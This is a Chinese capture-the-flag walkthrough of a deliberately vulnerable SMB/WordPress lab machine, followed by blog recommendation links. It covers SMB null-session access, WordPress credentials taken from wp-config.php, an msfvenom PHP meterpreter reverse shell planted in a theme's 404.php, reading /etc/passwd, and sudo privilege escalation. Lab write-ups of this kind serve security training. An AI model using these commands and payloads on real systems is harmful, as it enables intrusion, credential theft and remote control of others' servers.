CTF-SMB渗透
环境
Kali ip 192.168.56.102
Smb 靶机ip 192.168.56.103 靶场下载:
链接:https://pan.baidu.com/s/1OwNjBf7ZEGmFlRq79bkD_A
提取码:0eg6
信息探测
使用netdiscover -r ip/mask 进行内网网段存活ip探测

靶机为103

进行nmap端口探测和服务信息探测
nmap -sV -T4 -A 192.168.56.103

可以看到smb服务
针对SMB协议,使用空口令,若口令尝试登陆,并查看敏感文件,下载查看
0x01针对于开放服务进行弱口令尝试
smbclient -L 192.168.56.103

连接成功
分别查看三个共享连接是否有flag等敏感文件
smbclient ‘\\IP\$share’ 查看文件

尝试到share$连接时 发现可以空口令连接
查看文件

Robots.txt里的目录 每个查看后无果
查看deets.txt

发现一个密码为12345
然后继续查看敏感文件
Cd 到wordpress目录

发现敏感文件wp-config.php

读取到数据密码
尝试用数据库密码和12345登录到Mysql ssh

均失败
0x02针对于开放服务器的版本 尝试溢出漏洞
尝试searchsploit samba版本号 看看有没有现成的溢出漏洞
尝试过后无果
0x03针对于开放服务 进行深入信息探测
主机开放了80端口 针对于http服务 再次做信息探测
使用到的工具 dirb nikto owasp-zap进行目录扫描 漏洞扫描

发现后台地址
http://192.168.56.103/wordpress/wp-admin/
尝试使用我们得到的数据库密码和之前12345登录
使用数据库密码登录后台成功

后台程序为wordpress
想办法上传我们的webshell
0x04 webshell生成和上传
使用msfvenom生成php反弹shell
msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机IP地址 lport=4444 -f raw > /root/Desktop/shell.php


后台上传webshell

在后台的模版 可以直接插入我们的php代码
我插入的404页面的代码
保存成功后 msf开始监听反弹的shell

访问靶机404.php 执行反弹shell
http://靶场IP/wordpress/wp-content/themes/twenty
Fifteen/404.php

拿到shell后 找到和flag有关的信息和文件
优化终端:
python -c "import pty; pty.spawn('/bin/bash')"
先查找用户名: cat /etc/passwd

发现有个在home目录下的togie 猜测是用户名

-- su 用户名
-- sudo –l
-- su sudo
尝试切换到togie用户 发现需要密码 输入之前得到的12345
切换成功

查看root可以执行哪些目录的操作
sudo -l

发现有这些目录
提升权限
Sudo su

root目录下
最后成功拿到查看flag.txt 拿到flag
完毕。
CTF-SMB渗透的更多相关文章
- PtH(hash传递攻击)原理探秘
背景知识 Windows 横向渗透的两种方式 1.hash传递攻击,通过传递NTLM-Hash,登录机器,简称PtH: 2.ticket传递攻击,通过传递kerberos的ticket,登录机器,简称 ...
- 双非Java的学习之旅以及秋招路程
个人信息: 趁着中秋写个帖子记录一下吧.渣渣本,无实习,无高质量证书,走了很多弯路,最后选择的Java后端.现在算是半躺平了,接了几个中小厂的offer保底,20w多的薪资,后面还有几家公司接着面.不 ...
- 22. CTF综合靶机渗透(十五)
靶机说明: Game of Thrones Hacking CTF This is a challenge-game to measure your hacking skills. Set in Ga ...
- 21. CTF综合靶机渗透(十四)
靶机说明: I created this machine to help others learn some basic CTF hacking strategies and some tools. ...
- 20. CTF综合靶机渗透(十三)
靶机说明: Wellcome to "PwnLab: init", my first Boot2Root virtual machine. Meant to be easy, I ...
- 18. CTF综合靶机渗透(十一)
靶机描述: SkyDog Con CTF 2016 - Catch Me If You Can 难度:初学者/中级 说明:CTF是虚拟机,在虚拟箱中工作效果最好.下载OVA文件打开虚拟框,然后选择文件 ...
- 14. CTF综合靶机渗透(七)
靶机说明 NinevehV0.3.7z是一个难度为初级到中级的BooT2Root/CTF挑战. VM虚机配置有静态IP地址(192.168.0.150) 目标 Boot to root:获得root权 ...
- 13. CTF综合靶机渗透(六)
靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战. VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网,并 ...
- 内网渗透bypassuac和smb溢出
对内网渗透需要渗透的目标主机处于跨网段和uac限制的情况做一个渗透记录 环境大致如下 拥有shell权限的win7(有uac限制,处于双网段) 和同win7同一网段下暂时无权限的靶机xp 先对有权限的 ...
- 渗透测试思路 - CTF(番外篇)
渗透测试思路 Another:影子 (主要记录一下平时渗透的一些小流程和一些小经验) CTF(番外篇) 笔者是一个WEB狗,更多的是做一些WEB类型题目,只能怪笔者太菜,哭~~ 前言 本篇 ...
随机推荐
- Spring Cloud Eureka 分布式开发之服务注册中心、负载均衡、声明式服务调用实现
介绍 本示例主要介绍 Spring Cloud 系列中的 Eureka,使你能快速上手负载均衡.声明式服务.服务注册中心等 Eureka Server Eureka 是 Netflix 的子模块,它是 ...
- Winform中设置ZedGraph曲线图的水平与竖直参考线
场景 Winforn中设置ZedGraph曲线图的属性.坐标轴属性.刻度属性: https://blog.csdn.net/BADAO_LIUMANG_QIZHI/article/details/10 ...
- Sqoop介绍、安装与操作
搭建环境 部署节点操作系统为CentOS,防火墙和SElinux禁用,创建了一个shiyanlou用户并在系统根目录下创建/app目录,用于存放 Hadoop等组件运行包.因为该目录用于安装hadoo ...
- 浮动后的 <li> 如何在 <ul> 中居中显示?
百度了许久都没有满意的解决方案,现在终于搞定了. 其实,只要 ul 的父元素 css 样式设了 text-align: center; 然后 ul 设了 display: inline-block; ...
- IDEA微服务项目的application.yml没有绿色叶子的解决办法
1.今天在写微服务项目的时候成功入坑,那么问题是啥呢?接下来和我一起走入bug的世界吧,让我们看看究竟是怎么回事. *问题描述 1.application.yml是灰色的小格子 2.实在难看 *需要解 ...
- springboot之全局处理异常封装
springboot之全局处理异常封装 简介 在项目中经常出现系统异常的情况,比如NullPointerException等等.如果默认未处理的情况下,springboot会响应默认的错误提示,这样对 ...
- 【C/C++】qsort函数的使用方法和细节
函数概述 qsort 为quick_sort的简写,意为快速排序,主要用于对各种数组的排序. 因为数组的元素可能是任何类型的,甚至是结构或者联合,所以必须高数函数qsort如何确定两个数组元素哪一个& ...
- [Link 2005]vs2015 LNK2005 "class std::basic_ostream<char,struct std::char_traits<char> > & __cdecl printR(class std::basic_ostream<char,struct std::char_traits<char> > &,class QueryResult const &)" (?
vs2015 LNK2005 "class std::basic_ostream<char,struct std::char_traits<char> > &am ...
- 连接电脑时,无法启用USB调试
原因: 手机悬浮球 解决方案: 取消悬浮球,停止一切悬浮应用 (下面的废话可以不听) 预置条件: 手机已经打开开发者模式 开启USB调试模式 电脑能检测到手机 故事背景: 经常用手机连接电脑进行adb ...
- vscode中如何自动保存
是的,vscode是个不错的编辑器,它的扩展功能能支持很多的语言,然后在实践过程中,我们发现每写好一次就得手动按CTRL+S,未免有点手酸,这时候我们就可以开启我们的自动保存功能,方式也很简单,在 文 ...